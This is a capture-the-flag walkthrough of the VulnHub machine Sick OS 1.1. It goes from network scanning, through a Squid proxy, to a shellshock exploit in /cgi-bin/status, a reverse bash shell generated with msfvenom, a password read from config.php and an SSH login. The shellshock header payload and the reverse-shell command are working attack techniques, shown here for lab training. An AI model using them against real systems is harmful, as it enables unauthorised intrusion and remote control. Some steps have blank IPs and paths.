Sick OS 1.1 – VulnHub CTF Challenge Walkthrough

Sick OS is available at VulnHub. This machine is similar to ones you might see in OSCP labs. This is a challenging and exciting CTF that contains multiple vulnerabilities and privilege escalation vectors. This VM is intended for “Intermediates” and requires a lot of enumeration to get root.

Throughout this walkthrough, I’ll be using Parrot Sec OS but you can use Kali or any other distro.

Start the Virtual machine. Use netdiscover to determine the IP.

sudo netdiscover -r


Now edit “/etc/hosts” file and register this IP in the local DNS.


Run Nmap scan.


There’s an HTTP Proxy “Squid” which is filtering all inside ports except “22”. There should be an HTTP Server inside this firewall. We can check for presence of the HTTP Server using this proxy. Configure your browser with the proxy and test its localhost (


Then, test localhost


An HTTP Response indicates that there is a HTTP Server. Now, run a Nikto scan through that proxy to test for possible vulnerabilities.

nikto -h -useproxy http://sick.local:3128


The Nikto scan indicates that “/cgi-bin/status” suffers from “shellshock” vulnerability. Fire up Burp and go to “Repeater” tab. Set the proxy address as “Target” and start testing.


Send a HTTP Request to the localhost.

“/cgi-bin/status” appears to be vulnerable.

User-Agent: () { test;}; echo; /usr/bin/id; exit
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


We executed our command successfully. Now, we can execute our reverse shell. I’ll be using Metasploit’s PHP reverse shell.

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT=80 -f raw


On our Netcat listener, we got a reverse shell. Spawn a pty shell in the reverse shell.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/
python /tmp/


We got a lower shell. After some enumeration, you’ll see a file “config.php” in “/var/www/wolfcms/” directory that contains a password


Try logging in to SSH using username “sickos” and password “john@123”

ssh sickos@sick.local


And finally, here is the root flag!!!

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

Related posts

Match Systems publishes report on the consequences of CBDC implementation, led by CEO Andrei Kutin

Cypago Announces New Automation Support for AI Security and Governance

LayerSlider WordPress Plugin Vulnerability Affected Thousands Of Websites